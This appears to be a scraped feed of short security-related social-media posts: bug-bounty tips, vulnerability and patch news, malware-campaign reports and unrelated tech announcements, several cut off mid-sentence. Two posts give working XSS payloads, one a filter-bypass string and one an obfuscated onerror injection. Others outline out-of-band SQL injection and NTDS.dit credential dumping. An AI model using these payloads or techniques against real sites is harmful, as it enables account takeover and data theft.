HTML Sanitizer Bypass Cloudflare leads to XSS payload: '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/

Es una herramienta avanzada de análisis de vulnerabilidades web diseñada para ayudar a profesionales de la ciberseguridad y pentesters a detectar, evaluar y mitigar riesgos en aplicaciones web. Su objetivo es fortalecer la seguridad de los sistemas antes de que puedan ser

XSS WAF Bypass — Multi-character HTML Entities This technique uses multi-character HTML entities that are recognized by the browser… More details about this technique are shared in our WhatsApp channel. Channel: https://t.co/KMq9swf9b5 #bugbountytip #BugBounty #XSS #WAF

💥 XSS via MathML? A simple <style><!-- inside MathML triggers a full DOM-based XSS due to parser confusion. 🧠 Not your usual input sanitization failure. 👇 More weird real-world exploits on our WhatsApp channel: https://t.co/KMq9swfH0D #XSS #BugBounty

Another XSS Payload: {document.body.setAttribute('contenteditable',true)}document.execCommand('insert'+'HTML',false,'<img/'+'src/'+'o'+'nerror=a'+'lert('+'/catfather/)>') #bugbountytips #xss

Out-of-Band SQLi isn’t your typical injection. Instead of leaking data in HTTP responses, it exfiltrates via DNS/HTTP requests. Tools like Burp Collaborator help detect it. Think xp_dirtree in MSSQL or LOAD_FILE() in MySQL. Silent… but deadly. 💉 #BugBounty

In case you missed Black Hat USA 2025? Here are all the slides🫡 🔗 https://t.co/SBX71BxUwo

I've just added a new PR to impacket to add to secretsdump the "Shadow Snapshot Method via WMI" also for NTDS.dit. This way, NTDS.dit can be downloaded directly from disk without code execution. https://t.co/zJDl7r7xhJ

Security updates for August 2025 are now available! Details are here: https://t.co/WW89TchdN8 #PatchTuesday #SecurityUpdateGuide

🚨 How #Rhadamanthys Stealer Slips Past Defenses using ClickFix ⚠️ Rhadamanthys is now delivered via ClickFix, combining technical methods and social engineering to bypass automated security solutions, making detection and response especially challenging. 👾 While earlier

OK, some extra... https://t.co/UtYkzmaOEA

The only MCP server you'll ever need! MindsDB lets you query data from 200+ sources, like Slack, Gmail, social platforms, and more, in both SQL and natural language. A federated query engine that comes with a built-in MCP server. 100% open-source with 35k+ stars!

Pre-release! Airspace Visualizer is now on GitHub — ADS-B + VDL2 + AI assistant. - LInux (Windows w/minor tweaks) - Real-time aircraft display - Semantic RAG + chat - Geospatial overlays - Built for local data feeds 🔗 https://t.co/ETouuuI8ZX Early, rough, and ready for you

🎇 Website now has 7k active users, up another 3k from 4 days ago! 💥added a link on the desktop for sponsorship opportunities for those who may be interested 💥 also a link to my resume as i am still actively looking for employment Last night I worked on some optimization

WinRAR Zero-Day Under Active Exploitation – Update to Latest Version Immediately

Yay, I can tell that MSRC just patched another infrastructure wide ATO bug that I reported against Azure FD a month ago. The main Azure error page now has an updated format to remove the domain name from the error message, thus removing a stored XSS via HTTP/2 & HTTP/1 desync.

https://t.co/RV9naiCJO7

Intent is crucial in every project. That's why my architecture use: Feature structure approach. Traditional code organization focuses on technical patterns: - Command - Queries - Events This creates a significant problem: codebase doesn't reveal what application actually

🚩 Malicious Go & npm Packages Deliver Cross-Platform Malware and Trigger Remote Data Wipes https://t.co/EufsJNTR1J A recent campaign has unveiled 11 Go packages and 2 npm packages containing malicious post-install behavior. These packages silently launch shells, fetch

~Password reset payload list Don't forget to check out the new video! https://t.co/aLZlkXAHfK #BugBounty